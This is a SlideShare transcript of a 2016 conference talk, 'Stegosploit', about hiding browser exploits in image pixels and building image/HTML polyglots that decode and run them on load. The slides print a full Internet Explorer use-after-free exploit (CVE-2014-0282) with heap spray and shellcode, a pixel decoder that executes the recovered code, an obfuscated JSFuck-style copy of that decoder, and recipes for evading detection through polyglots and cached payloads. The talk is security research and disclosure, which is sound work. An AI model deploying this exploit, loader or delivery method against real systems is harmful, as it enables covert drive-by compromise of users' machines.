SlideShare a Scribd company logo

Stegosploit - NCSC ONE 2016

โ€ข
โ€ข
Saumil Shah
Saumil Shah

My presentation on "Stegosploit" - exploits delivered via steganography and polyglots at NCSC ONE 2016, Den Haag, Netherlands.

Internet
1 of 44
NETSQUARE PAINTING AN EXPLOIT IN AN IMAGE SAUMIL SHAH NCSC ONE 2016 STEGOSPLOIT
NETSQUARE @therealsaumil saumilshah hacker, trainer, speaker, author, photographer educating, entertaining and exasperating audiences since 1999. Saumil Shah CEO, Net-Square NETSQUARE
NETSQUARE A good exploit is one that is delivered in style
NETSQUARE Agenda โ€ขโ€ฏ Stegosploit design goals โ€ขโ€ฏ Stegosploit-ing an exploit โ€ขโ€ฏ Steganography techniques โ€ขโ€ฏ The decoder โ€ขโ€ฏ Polyglot Images โ€ขโ€ฏ Conclusions
NETSQUARENETSQUARE Stegosploit Design Goals โ€ขโ€ฏ Only VALID images on network and disk. โ€ขโ€ฏ Exploit code hidden in pixels. โ€ขโ€ฏ Self contained decoder code. โ€ขโ€ฏ Exploit automatically decoded and triggered upon loading... โ€ขโ€ฏ ...all with just ONE IMAGE, โ€ขโ€ฏ in STYLE!
NETSQUARE Steganography NETSQUARE
NETSQUARE Polyglots Two or more data formats in a single container... ...that co-exist happily without breaking each other's spec or syntax.
NETSQUARE Stegosploit-ing a browser exploit IMAJS STEGO- DECODER JAVASCRIPT TARGET BROWSER POLYGLOT PIXEL ENCODER EXPLOIT CODE IMAGE ENCODED IMAGE Case study: CVE-2014-0282 -โ€ฏ IE CInput Use-After-Free -โ€ฏ hidden in a JPG Case study: CVE-2013-1690 -โ€ฏ FF onreadystatechange UAF -โ€ฏ hidden in a PNG
NETSQUARE Step 1. Hiding the Exploit Code in the Image PIXEL ENCODER EXPLOIT CODE IMAGE ENCODED IMAGE
NETSQUARE Hiding an Exploit in an Image . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . "SAUMIL" = 01010011 01000001 01010101 01001101 01001001 01001100
NETSQUARE ganesha.jpg Hiding an Exploit in an Image function H5(){this.d=[];this.m=new Array();this.f=new Array()}H5.prototype.flatten=function(){for(var f=0;f<this.d.length;f+ +){var n=this.d[f];if(typeof(n)=='number'){var c=n.toString(16);while(c.length<8){c='0'+c}var l=function(a) {return(parseInt(c.substr(a,2),16))};var g=l(6),h=l(4),k=l(2),m=l(0);this.f.push(g);this.f.push(h);this.f.push(k);this.f.push(m)}if(typeof(n)=='string'){for(var d=0;d<n.length;d++){this.f.push(n.charCodeAt(d))}}}};H5.prototype.fill=function(a){for(var c=0,b=0;c<a.data.length;c++,b ++){if(b>=8192){b=0}a.data[c]=(b<this.f.length)?this.f[b]:255}};H5.prototype.spray=function(d){this.flatten();for(var b=0;b<d;b++){var c=document.createElement('canvas');c.width=131072;c.height=1;var a=c.getContext('2d').createImageData(c.width,c.height);this.fill(a);this.m[b]=a}};H5.prototype.setData=function(a) {this.d=a};var flag=false;var heap=new H5();try{location.href='ms-help:'}catch(e){}function spray(){var a='xfc xe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4a x26x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf0x52x57x8bx52x10x8bx42x3c x01xd0x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8bx58x20x01xd3xe3x3cx49x8bx34x8b x01xd6x31xffx31xc0xacxc1xcfx0dx01xc7x38xe0x75xf4x03x7dxf8x3bx7dx24x75xe2x58x8b x58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5a x51xffxe0x58x5fx5ax8bx12xebx86x5dx6ax01x8dx85xb9x00x00x00x50x68x31x8bx6fx87xffxd5xbb xf0xb5xa2x56x68xa6x95xbdx9dxffxd5x3cx06x7cx0ax80xfbxe0x75x05xbbx47x13x72x6fx6ax00x53xff xd5x63x61x6cx63x2ex65x78x65x00';var c=[];for(var b=0;b<1104;b+=4){c.push(1371756628)} c.push(1371756627);c.push(1371351263);var f=[1371756626,215,2147353344,1371367674,202122408,4294967295,202122400,202122404,64,202116108,2021212 48,16384];var d=c.concat(f);d.push(a);heap.setData(d);heap.spray(256)}function changer(){var c=new Array();for(var a=0;a<100;a++){c.push(document.createElement('img'))}if(flag) {document.getElementById('fm').innerHTML='';CollectGarbage();var b='u2020u0c0c';for(var a=4;a<110;a+=2){b +='u4242'}for(var a=0;a<c.length;a++){c[a].title=b}}}function run() {spray();document.getElementById('c2').checked=true;document.getElementById('c2').onpropertychange=changer;flag= true;document.getElementById('fm').reset()}setTimeout(run,1000); IE Use-After-Free CVE-2014-0282
NETSQUARE 1 pixel = 8 bits (grayscale) The "Bit Layer" View 7โ€ฏ 6 5 4 3 2 1 0 | | MSB LSB
NETSQUARE more shape less detail 7 6 5 4 3 2 1 0 less shape more detail The "Bit Layer" View
NETSQUARE
NETSQUARE 7 6 5 4 3 2 1 0
NETSQUARE Exploit code converted to bitstream. Pixel bits of layer 7 are overwritten with exploit bitstream. Encoding at Bit Layer 7 7 6 5 4 3 2 1 0 | | MSB LSB
Encoding data at bit layer 7 Signi๏ฌcant visual aberration
NETSQUARE Exploit code converted to bitstream. Pixel bits of layer 2 are overwritten with exploit bitstream. Encoding at Bit Layer 2 7 6 5 4 3 2 1 0 | | MSB LSB
Encoding data at bit layer 2 No perceptible visual aberration
NETSQUARE Encoding on JPG vs PNG โ€ขโ€ฏ JPG = lossy compression โ€ขโ€ฏ Pixels approximated to nearest neighbours โ€ขโ€ฏ Multi-pass encoding โ€ขโ€ฏ Min. layer = 2 or 3 โ€ขโ€ฏ Browser specific JPEG encoders โ€ขโ€ฏ PNG = lossless compression โ€ขโ€ฏ Negligible visual distortion in the image โ€ขโ€ฏ Single pass encoding โ€ขโ€ฏ Min. layer = 0 โ€ขโ€ฏ Independent of browser's PNG encoder
NETSQUARE Step 2. Decoding the encoded Pixel Data ? STEGO- DECODER JAVASCRIPT ENCODED IMAGE
NETSQUARE HTML5 CANVAS to the rescue! โ€ขโ€ฏ In-browser decoding of steganographically encoded images. โ€ขโ€ฏ Read image pixel data using JS. โ€ขโ€ฏ Rebuild JS exploit code from pixel data, in memory. โ€ขโ€ฏ Simple array and bit manipulation operations.
NETSQUARE decode_pixels.js L=2,C=3,G=3,a=[],x=y=0,z=1<<L,I=parseInt,S=String.fromCharCode;window.onload= function(){P.onclick=function({V=document.createElement("canvas");k=P.parentNode; k.insertBefore(V,P);W=V.width=P.width;H=V.height=P.height;m=V.getContext("2d"); m.drawImage(P,0,0);k.removeChild(P);m=m.getImageData(0,0,W,H).data;c=function(p,x,y) {n=(y*W+x)*4;r=(p[n]&z)>>L;g=(p[n+1]&z)>>L;b=(p[n+2]&z)>>L;return S([r,g,b,r][C]+48)}; k=function(l){for(i=j=0;j<l*8;j++){a[i++]=c(m,x,y);x+=G;if(x>=W){x=0;y+=G}}};k(6); k(I(X(a)));try{CollectGarbage()}catch(e){}setTimeout(new Function(X(a)),99)}};function X(c){s="",d=c.join(s);for(i=0;i<d.length;i+=8)s+=S(I(d.substr(i,8),2));return s} $=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$) +"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"""+""+$.__$+$.__$+$.$__+"="+$._$_+","+$.__$+$.___+$._$$+"="+$._$$+","+ $.__$+$.___+$.$$$+"="+$._$$+","+$.$_$_+"=[],"+$.__$+$.$$$+$.___+"="+$.__$+$.$$$+$.__$+"="+$.___+","+$.__$+$.$$$+$._$_+"="+$.__$+"<<"+$.__$+$.__$+$.$__+","+$.__$+$.__$+$.__$+"="+$.__$+$.$$_+$.___+$.$_$_+""+$.__$+$.$$_+$._$_+""+ $.__$+$.$$_+$._$$+$.$$$_+""+$.__$+$.__$+$.__$+""+$.__$+$.$_$+$.$$_+$.__+","+$.__$+$._$_+$._$$+"="+$.__$+$._$_+$._$$+$.__+""+$.__$+$.$$_+$._$_+""+$.__$+$.$_$+$.__$+""+$.__$+$.$_$+$.$$_+""+$.__$+$.$__+$.$$$+"."+$.$$$$+""+$.__$+ $.$$_+$._$_+$._$+""+$.__$+$.$_$+$.$_$+""+$.__$+$.___+$._$$+""+$.__$+$.$_$+$.___+$.$_$_+""+$.__$+$.$$_+$._$_+""+$.__$+$.___+$._$$+$._$+$.$$_$+$.$$$_+";"+$.__$+$.$$_+$.$$$+""+$.__$+$.$_$+$.__$+""+$.__$+$.$_$+$.$$_+$.$$_$+$._$+" "+$.__$+$.$$_+$.$$$+"."+$._$+""+$.__$+$.$_$+$.$$_+(![]+"")[$._$_]+$._$+$.$_$_+$.$$_$+"="+$.$$$$+$._+""+$.__$+$.$_$+$.$$_+$.$$__+$.__+""+$.__$+$.$_$+$.__$+$._$+""+$.__$+$.$_$+$.$$_+"(){"+$.__$+$._$_+$.___+"."+$._$+""+$.__$+$.$_$+$.$$_ +$.$$__+(![]+"")[$._$_]+""+$.__$+$.$_$+$.__$+$.$$__+""+$.__$+$.$_$+$._$$+"="+$.$$$$+$._+""+$.__$+$.$_$+$.$$_+$.$$__+$.__+""+$.__$+$.$_$+$.__$+$._$+""+$.__$+$.$_$+$.$$_+"(){"+$.__$+$._$_+$.$$_+"="+$.$$_$+$._$+$.$$__+$._+""+$.__$+$. $_$+$.$_$+$.$$$_+""+$.__$+$.$_$+$.$$_+$.__+"."+$.$$__+""+$.__$+$.$$_+$._$_+$.$$$_+$.$_$_+$.__+$.$$$_+""+$.__$+$.___+$.$_$+(![]+"")[$._$_]+$.$$$_+""+$.__$+$.$_$+$.$_$+$.$$$_+""+$.__$+$.$_$+$.$$_+$.__+"(""+$.$$__+$.$_$_+""+$.__$+$. $_$+$.$$_+""+$.__$+$.$$_+$.$$_+$.$_$_+""+$.__$+$.$$_+$._$$+"");"+$.__$+$.$_$+$._$$+"="+$.__$+$._$_+$.___+"."+$.__$+$.$$_+$.___+$.$_$_+""+$.__$+$.$$_+$._$_+$.$$$_+""+$.__$+$.$_$+$.$$_+$.__+""+$.__$+$.__$+$.$$_+$._$+$.$$_$+$.$$ $_+";"+$.__$+$.$_$+$._$$+"."+$.__$+$.$_$+$.__$+""+$.__$+$.$_$+$.$$_+""+$.__$+$.$$_+$._$$+$.$$$_+""+$.__$+$.$$_+$._$_+$.__+""+$.__$+$.___+$._$_+$.$$$_+$.$$$$+$._$+""+$.__$+$.$$_+$._$_+$.$$$_+"("+$.__$+$._$_+$.$$_+","+$.__$+$._ $_+$.___+");"+$.__$+$._$_+$.$$$+"="+$.__$+$._$_+$.$$_+"."+$.__$+$.$$_+$.$$$+""+$.__$+$.$_$+$.__$+$.$$_$+$.__+""+$.__$+$.$_$+$.___+"="+$.__$+$._$_+$.___+"."+$.__$+$.$$_+$.$$$+""+$.__$+$.$_$+$.__$+$.$$_$+$.__+""+$.__$+$.$_$+ $.___+";"+$.__$+$.__$+$.___+"="+$.__$+$._$_+$.$$_+"."+$.__$+$.$_$+$.___+$.$$$_+""+$.__$+$.$_$+$.__$+""+$.__$+$.$__+$.$$$+""+$.__$+$.$_$+$.___+$.__+"="+$.__$+$._$_+$.___+"."+$.__$+$.$_$+$.___+$.$$$_+""+$.__$+$.$_$+$.__$+""+ $.__$+$.$__+$.$$$+""+$.__$+$.$_$+$.___+$.__+";"+$.__$+$.$_$+$.$_$+"="+$.__$+$._$_+$.$$_+"."+$.__$+$.$__+$.$$$+$.$$$_+$.__+""+$.__$+$.___+$._$$+$._$+""+$.__$+$.$_$+$.$$_+$.__+$.$$$_+""+$.__$+$.$$$+$.___+$.__+"(""+$._$_+$.$$_$+" ");"+$.__$+$.$_$+$.$_$+"."+$.$$_$+""+$.__$+$.$$_+$._$_+$.$_$_+""+$.__$+$.$$_+$.$$$+""+$.__$+$.__$+$.__$+""+$.__$+$.$_$+$.$_$+$.$_$_+""+$.__$+$.$__+$.$$$+$.$$$_+"("+$.__$+$._$_+$.___+","+$.___+","+$.___+");"+$.__$+$.$_$+$._$$+"."+ $.__$+$.$$_+$._$_+$.$$$_+""+$.__$+$.$_$+$.$_$+$._$+""+$.__$+$.$$_+$.$$_+$.$$$_+""+$.__$+$.___+$._$$+""+$.__$+$.$_$+$.___+""+$.__$+$.$_$+$.__$+(![]+"")[$._$_]+$.$$_$+"("+$.__$+$._$_+$.___+");"+$.__$+$.$_$+$.$_$+"="+$.__$+$.$_$+$.$_ $+"."+$.__$+$.$__+$.$$$+$.$$$_+$.__+""+$.__$+$.__$+$.__$+""+$.__$+$.$_$+$.$_$+$.$_$_+""+$.__$+$.$__+$.$$$+$.$$$_+""+$.__$+$.___+$.$__+$.$_$_+$.__+$.$_$_+"("+$.___+","+$.___+","+$.__$+$._$_+$.$$$+","+$.__$+$.__$+$.___+")."+$.$$_$+ $.$_$_+$.__+$.$_$_+";"+$.$$__+"="+$.$$$$+$._+""+$.__$+$.$_$+$.$$_+$.$$__+$.__+""+$.__$+$.$_$+$.__$+$._$+""+$.__$+$.$_$+$.$$_+"("+$.__$+$.$$_+$.___+","+$.__$+$.$$$+$.___+","+$.__$+$.$$$+$.__$+"){"+$.__$+$.$_$+$.$$_+"=("+$.__$+$.$$ $+$.__$+"*"+$.__$+$._$_+$.$$$+"+"+$.__$+$.$$$+$.___+")*"+$.$__+";"+$.__$+$.$$_+$._$_+"=("+$.__$+$.$$_+$.___+"["+$.__$+$.$_$+$.$$_+"]&"+$.__$+$.$$$+$._$_+")>>"+$.__$+$.__$+$.$__+";"+$.__$+$.$__+$.$$$+"=("+$.__$+$.$$_+$.___+"["+ $.__$+$.$_$+$.$$_+"+"+$.__$+"]&"+$.__$+$.$$$+$._$_+")>>"+$.__$+$.__$+$.$__+";"+$.$_$$+"=("+$.__$+$.$$_+$.___+"["+$.__$+$.$_$+$.$$_+"+"+$._$_+"]&"+$.__$+$.$$$+$._$_+")>>"+$.__$+$.__$+$.$__+";"+$.__$+$.$$_+$._$_+$.$$$_+$.__+$._+""+ $.__$+$.$$_+$._$_+""+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.__$+$._$_+$._$$+"(["+$.__$+$.$$_+$._$_+","+$.__$+$.$__+$.$$$+","+$.$_$$+","+$.__$+$.$$_+$._$_+"]["+$.__$+$.___+$._$$+"]+"+$.$__+$.$___+")};"+$.__$+$.$_$+$._$$+"="+$.$$$$+ $._+""+$.__$+$.$_$+$.$$_+$.$$__+$.__+""+$.__$+$.$_$+$.__$+$._$+""+$.__$+$.$_$+$.$$_+"("+(![]+"")[$._$_]+"){"+$.$$$$+$._$+""+$.__$+$.$$_+$._$_+"("+$.__$+$.$_$+$.__$+"="+$.__$+$.$_$+$._$_+"="+$.___+";"+$.__$+$.$_$+$._$_+"<"+(![]+"")[$._$_] +"*"+$.$___+";"+$.__$+$.$_$+$._$_+"++){"+$.$_$_+"["+$.__$+$.$_$+$.__$+"++]="+$.$$__+"("+$.__$+$.$_$+$.$_$+","+$.__$+$.$$$+$.___+","+$.__$+$.$$$+$.__$+");"+$.__$+$.$$$+$.___+"+="+$.__$+$.___+$.$$$+";"+$.__$+$.$_$+$.__$+$.$$$$+"("+ $.__$+$._$_+$.$$$+"<"+$.__$+$.$$$+$.___+"){"+$.__$+$.$$$+$.___+"="+$.___+";"+$.__$+$.$$$+$.__$+"+="+$.__$+$.___+$.$$$+"}}};"+$.__$+$.$_$+$._$$+"("+$.$$_+");"+$.__$+$.$_$+$._$$+"("+$.__$+$.__$+$.__$+"("+$.__$+$._$$+$.___+"("+$.$_$_ +")));"+$.__+""+$.__$+$.$$_+$._$_+""+$.__$+$.$$$+$.__$+"{"+$.__$+$.___+$._$$+$._$+(![]+"")[$._$_]+(![]+"")[$._$_]+$.$$$_+$.$$__+$.__+""+$.__$+$.___+$.$$$+$.$_$_+""+$.__$+$.$$_+$._$_+$.$_$$+$.$_$_+""+$.__$+$.$__+$.$$$+$.$$$_+"()}"+$.$$__+ $.$_$_+$.__+$.$$__+""+$.__$+$.$_$+$.___+"("+$.$$$_+"){}"+$.__$+$.$$_+$._$$+$.$$$_+$.__+""+$.__$+$._$_+$.$__+""+$.__$+$.$_$+$.__$+""+$.__$+$.$_$+$.$_$+$.$$$_+$._$+$._+$.__+"("+$.__$+$.$_$+$.$$_+$.$$$_+""+$.__$+$.$$_+$.$$$+""+$. $__+$.___+""+$.__$+$.___+$.$$_+$._+""+$.__$+$.$_$+$.$$_+$.$$__+$.__+""+$.__$+$.$_$+$.__$+$._$+""+$.__$+$.$_$+$.$$_+"("+$.__$+$._$$+$.___+"("+$.$_$_+")),"+$.$__$+$.$__$+")}};"+$.$$$$+$._+""+$.__$+$.$_$+$.$$_+$.$$__+$.__+""+$.__$+$. $_$+$.__$+$._$+""+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.__$+$._$$+$.___+"("+$.$$__+"){"+$.__$+$.$$_+$._$$+"="","+$.$$_$+"="+$.$$__+"."+$.__$+$.$_$+$._$_+$._$+""+$.__$+$.$_$+$.__$+""+$.__$+$.$_$+$.$$_+"("+$.__$+$.$$_+$._$$+");"+ $.$$$$+$._$+""+$.__$+$.$$_+$._$_+"("+$.__$+$.$_$+$.__$+"="+$.___+";"+$.__$+$.$_$+$.__$+"<"+$.$$_$+"."+(![]+"")[$._$_]+$.$$$_+""+$.__$+$.$_$+$.$$_+""+$.__$+$.$__+$.$$$+$.__+""+$.__$+$.$_$+$.___+";"+$.__$+$.$_$+$.__$+"+="+$.$___+")"+ $.__$+$.$$_+$._$$+"+="+$.__$+$._$_+$._$$+"("+$.__$+$.__$+$.__$+"("+$.$$_$+"."+$.__$+$.$$_+$._$$+$._+$.$_$$+""+$.__$+$.$$_+$._$$+$.__+""+$.__$+$.$$_+$._$_+"("+$.__$+$.$_$+$.__$+","+$.$___+"),"+$._$_+"));"+$.__$+$.$$_+$._$_+$.$$$_+ $.__+$._+""+$.__$+$.$$_+$._$_+""+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.__$+$.$$_+$._$$+"}"+""")())();
NETSQUARE Step 3. Images that ``Auto Run`` IMAJS STEGO- DECODER JAVASCRIPT POLYGLOT ENCODED IMAGE
NETSQUARE IMAJS I SEE PIXELS I SEE CODE
NETSQUARE IMAJS - Image+JS Polyglot Image Javascript Holy Sh** Bipolar Content! <img> sees pixels <script> sees code #YourPointOfView
NETSQUARE I JPG IMAJS-JPG! JPG +HTML +JS +CSS
NETSQUARE IMAJS-JPG Recipe
NETSQUARE IMAJS-JPG Recipe SOI FF D8 APP0 length J F I F 0 versn Xres DQT SOF0 DHT FF E0 U Yres H V FF DB quantization tables DQT FF DB quantization tables FF C0 start of frame FF C4 Hu๏ฌ€man tables
NETSQUARE IMAJS-JPG Recipe SOI FF D8 APP0 length J F I F 0 versn Xres FF E0 U Yres H V ... more random data ... <html random random random random... and other HTML stu๏ฌ€ goes here... random ><head random> decoder script <script type=text/undefined> ... DQT SOF0 DHT FF DB quantization tables DQT FF DB quantization tables FF C0 start of frame FF C4 Hu๏ฌ€man tables
NETSQUARE IMAJS-PNG Recipe Inspiration: http://daeken.com/superpacking-js-demos PNG Header 89 50 4E 47 0D 0A 1A 0A IHDR IHDRlength chunk data CRC tEXtlength _00<html random random ... CRC random><head random> decoder script and other HTML stu๏ฌ€ goes here... <script type=text/undefined>... extra tEXt chunk IDATlength pixel data CRCIDAT chunk IDATlength pixel data CRCIDAT chunk IDATlength pixel data CRCIDAT chunk IEND0 CRCIEND chunk
NETSQUARE Step 4. The Finer Points of Package Delivery
NETSQUARE Content Sni๏ฌƒng Credits: Michael Zalewski @lcamtuf
NETSQUARE Exploit code encoded in image. EVIL GET /lolcat.png 200 OK Expires: 6 months I'M IN UR BASE Decoder script references image from cache. SAFE GET /lolcat.png Load from cache ....KILLING UR DOODZ DEC 2015 APR 2016 < PAYLOADS GO back in time
NETSQUARE Good to Go
NETSQUARE Conclusions
NETSQUARE 2010: Theory, 2014: Practice
NETSQUARE Today's attacks succeed because the defense is REACTIVE
NETSQUARE Today's Infosec Defence? Rules Signatures Updates Machine Learning
NETSQUARE Browsers and W3C - Wake Up! BROWSERS โ€ขโ€ฏ Don't be afraid to "BREAK THE WEB". โ€ขโ€ฏ Reject content that does not conform to strict standards/specs. W3C โ€ขโ€ฏ STRICT parsing rules โ€“ like COMPILERS. โ€ขโ€ฏ Browser compliance and user- awareness is YOUR responsibility.
NETSQUARE HTML rendering should be...
NETSQUARE ...a "zero tolerance" process.
NETSQUARE Tools http://stegosploit.info Paper PoC||GTFO 0x08
NETSQUARE THE END Saumil Shah @therealsaumil saumilshah saumil@net-square.com Photography: ๏ฌ‚ickr.com/saumil www.spectral-lines.in

Recommended

Stegosploit - Blackhat Europe 2015
Stegosploit - Blackhat Europe 2015Stegosploit - Blackhat Europe 2015
Stegosploit - Blackhat Europe 2015
Saumil Shah
ย 
Stegosploit - Hack.LU 2015
Stegosploit - Hack.LU 2015Stegosploit - Hack.LU 2015
Stegosploit - Hack.LU 2015
Saumil Shah
ย 
Hacking With Pictures SyScan 2015
Hacking With Pictures SyScan 2015Hacking With Pictures SyScan 2015
Hacking With Pictures SyScan 2015
Saumil Shah
ย 
When Bad Things Come In Good Packages
When Bad Things Come In Good PackagesWhen Bad Things Come In Good Packages
When Bad Things Come In Good Packages
Saumil Shah
ย 
Pixelplant - WebDev Meetup Salzburg
Pixelplant - WebDev Meetup SalzburgPixelplant - WebDev Meetup Salzburg
Pixelplant - WebDev Meetup Salzburg
wolframkriesing
ย 
Google's HTML5 Work: what's next?
Google's HTML5 Work: what's next?Google's HTML5 Work: what's next?
Google's HTML5 Work: what's next?
Patrick Chanezon
ย 
Crush Candy with DukeScript
Crush Candy with DukeScriptCrush Candy with DukeScript
Crush Candy with DukeScript
Anton Epple
ย 
Mini-curso JavaFX Aula2
Mini-curso JavaFX Aula2Mini-curso JavaFX Aula2
Mini-curso JavaFX Aula2
Raphael Marques
ย 

Recommended

Stegosploit - Blackhat Europe 2015
Stegosploit - Blackhat Europe 2015Stegosploit - Blackhat Europe 2015
Stegosploit - Blackhat Europe 2015
Saumil Shah
ย 
Stegosploit - Hack.LU 2015
Stegosploit - Hack.LU 2015Stegosploit - Hack.LU 2015
Stegosploit - Hack.LU 2015
Saumil Shah
ย 
Hacking With Pictures SyScan 2015
Hacking With Pictures SyScan 2015Hacking With Pictures SyScan 2015
Hacking With Pictures SyScan 2015
Saumil Shah
ย 
When Bad Things Come In Good Packages
When Bad Things Come In Good PackagesWhen Bad Things Come In Good Packages
When Bad Things Come In Good Packages
Saumil Shah
ย 
Pixelplant - WebDev Meetup Salzburg
Pixelplant - WebDev Meetup SalzburgPixelplant - WebDev Meetup Salzburg
Pixelplant - WebDev Meetup Salzburg
wolframkriesing
ย 
Google's HTML5 Work: what's next?
Google's HTML5 Work: what's next?Google's HTML5 Work: what's next?
Google's HTML5 Work: what's next?
Patrick Chanezon
ย 
Crush Candy with DukeScript
Crush Candy with DukeScriptCrush Candy with DukeScript
Crush Candy with DukeScript
Anton Epple
ย 
Mini-curso JavaFX Aula2
Mini-curso JavaFX Aula2Mini-curso JavaFX Aula2
Mini-curso JavaFX Aula2
Raphael Marques
ย 
JavaFX
JavaFXJavaFX
JavaFX
Raphael Marques
ย 
Ssaw08 0624
Ssaw08 0624Ssaw08 0624
Ssaw08 0624
Atsushi Tadokoro
ย 
Lambda expressions in C++
Lambda expressions in C++Lambda expressions in C++
Lambda expressions in C++
Dimitrios Platis
ย 
The history of Flash
The history of FlashThe history of Flash
The history of Flash
Maso Lin
ย 
ARTDM 170, Week 13: Text Elements + Arrays
ARTDM 170, Week 13: Text Elements + ArraysARTDM 170, Week 13: Text Elements + Arrays
ARTDM 170, Week 13: Text Elements + Arrays
Gilbert Guerrero
ย 
Mini-curso JavaFX Aula3 UFPB
Mini-curso JavaFX Aula3 UFPBMini-curso JavaFX Aula3 UFPB
Mini-curso JavaFX Aula3 UFPB
Raphael Marques
ย 
Writing SOLID C++ [gbgcpp meetup @ Zenseact]
Writing SOLID C++ [gbgcpp meetup @ Zenseact]Writing SOLID C++ [gbgcpp meetup @ Zenseact]
Writing SOLID C++ [gbgcpp meetup @ Zenseact]
Dimitrios Platis
ย 
Mini-curso JavaFX Aula1
Mini-curso JavaFX Aula1Mini-curso JavaFX Aula1
Mini-curso JavaFX Aula1
Raphael Marques
ย 
The Infosec Crossroads - 44CON 2016
The Infosec Crossroads - 44CON 2016The Infosec Crossroads - 44CON 2016
The Infosec Crossroads - 44CON 2016
Saumil Shah
ย 
Hack.LU - The Infosec Crossroads
Hack.LU - The Infosec CrossroadsHack.LU - The Infosec Crossroads
Hack.LU - The Infosec Crossroads
Saumil Shah
ย 
2016: The Infosec Crossroads - Keynote at Intuit #Hacktober2015
2016: The Infosec Crossroads - Keynote at Intuit #Hacktober20152016: The Infosec Crossroads - Keynote at Intuit #Hacktober2015
2016: The Infosec Crossroads - Keynote at Intuit #Hacktober2015
Saumil Shah
ย 
Introduction to Debuggers
Introduction to DebuggersIntroduction to Debuggers
Introduction to Debuggers
Saumil Shah
ย 
How Functions Work
How Functions WorkHow Functions Work
How Functions Work
Saumil Shah
ย 
Keep Calm and Stegosploit - 44CON 2015
Keep Calm and Stegosploit - 44CON 2015Keep Calm and Stegosploit - 44CON 2015
Keep Calm and Stegosploit - 44CON 2015
Saumil Shah
ย 
Operating Systems - A Primer
Operating Systems - A PrimerOperating Systems - A Primer
Operating Systems - A Primer
Saumil Shah
ย 
CSW2017 Saumil shah stegosploit_internals_cansecwest_2017
CSW2017 Saumil shah stegosploit_internals_cansecwest_2017CSW2017 Saumil shah stegosploit_internals_cansecwest_2017
CSW2017 Saumil shah stegosploit_internals_cansecwest_2017
CanSecWest
ย 
Stegosploit - Hacking With Pictures HITB2015AMS
Stegosploit - Hacking With Pictures HITB2015AMSStegosploit - Hacking With Pictures HITB2015AMS
Stegosploit - Hacking With Pictures HITB2015AMS
Saumil Shah
ย 
Dive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented ProgrammingDive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented Programming
Saumil Shah
ย 
Intro to computer vision in .net
Intro to computer vision in .netIntro to computer vision in .net
Intro to computer vision in .net
Stephen Lorello
ย 
Intro to HTML5
Intro to HTML5Intro to HTML5
Intro to HTML5
Jussi Pohjolainen
ย 
Building Native Apps- A Digital Canvas for Coders and Designers with Walter Luh
Building Native Apps- A Digital Canvas for Coders and Designers with Walter LuhBuilding Native Apps- A Digital Canvas for Coders and Designers with Walter Luh
Building Native Apps- A Digital Canvas for Coders and Designers with Walter Luh
FITC
ย 
I Can't Believe It's Not Flash
I Can't Believe It's Not FlashI Can't Believe It's Not Flash
I Can't Believe It's Not Flash
Thomas Fuchs
ย 

More Related Content

What's hot

ARTDM 170, Week 13: Text Elements + Arrays
ARTDM 170, Week 13: Text Elements + ArraysARTDM 170, Week 13: Text Elements + Arrays
ARTDM 170, Week 13: Text Elements + Arrays
Gilbert Guerrero
ย 

What's hot (8)

JavaFX
JavaFXJavaFX
JavaFX
ย 
Ssaw08 0624
Ssaw08 0624Ssaw08 0624
Ssaw08 0624
ย 
Lambda expressions in C++
Lambda expressions in C++Lambda expressions in C++
Lambda expressions in C++
ย 
The history of Flash
The history of FlashThe history of Flash
The history of Flash
ย 
ARTDM 170, Week 13: Text Elements + Arrays
ARTDM 170, Week 13: Text Elements + ArraysARTDM 170, Week 13: Text Elements + Arrays
ARTDM 170, Week 13: Text Elements + Arrays
ย 
Mini-curso JavaFX Aula3 UFPB
Mini-curso JavaFX Aula3 UFPBMini-curso JavaFX Aula3 UFPB
Mini-curso JavaFX Aula3 UFPB
ย 
Writing SOLID C++ [gbgcpp meetup @ Zenseact]
Writing SOLID C++ [gbgcpp meetup @ Zenseact]Writing SOLID C++ [gbgcpp meetup @ Zenseact]
Writing SOLID C++ [gbgcpp meetup @ Zenseact]
ย 
Mini-curso JavaFX Aula1
Mini-curso JavaFX Aula1Mini-curso JavaFX Aula1
Mini-curso JavaFX Aula1
ย 

Viewers also liked

CSW2017 Saumil shah stegosploit_internals_cansecwest_2017
CSW2017 Saumil shah stegosploit_internals_cansecwest_2017CSW2017 Saumil shah stegosploit_internals_cansecwest_2017
CSW2017 Saumil shah stegosploit_internals_cansecwest_2017
CanSecWest
ย 

Viewers also liked (10)

The Infosec Crossroads - 44CON 2016
The Infosec Crossroads - 44CON 2016The Infosec Crossroads - 44CON 2016
The Infosec Crossroads - 44CON 2016
ย 
Hack.LU - The Infosec Crossroads
Hack.LU - The Infosec CrossroadsHack.LU - The Infosec Crossroads
Hack.LU - The Infosec Crossroads
ย 
2016: The Infosec Crossroads - Keynote at Intuit #Hacktober2015
2016: The Infosec Crossroads - Keynote at Intuit #Hacktober20152016: The Infosec Crossroads - Keynote at Intuit #Hacktober2015
2016: The Infosec Crossroads - Keynote at Intuit #Hacktober2015
ย 
Introduction to Debuggers
Introduction to DebuggersIntroduction to Debuggers
Introduction to Debuggers
ย 
How Functions Work
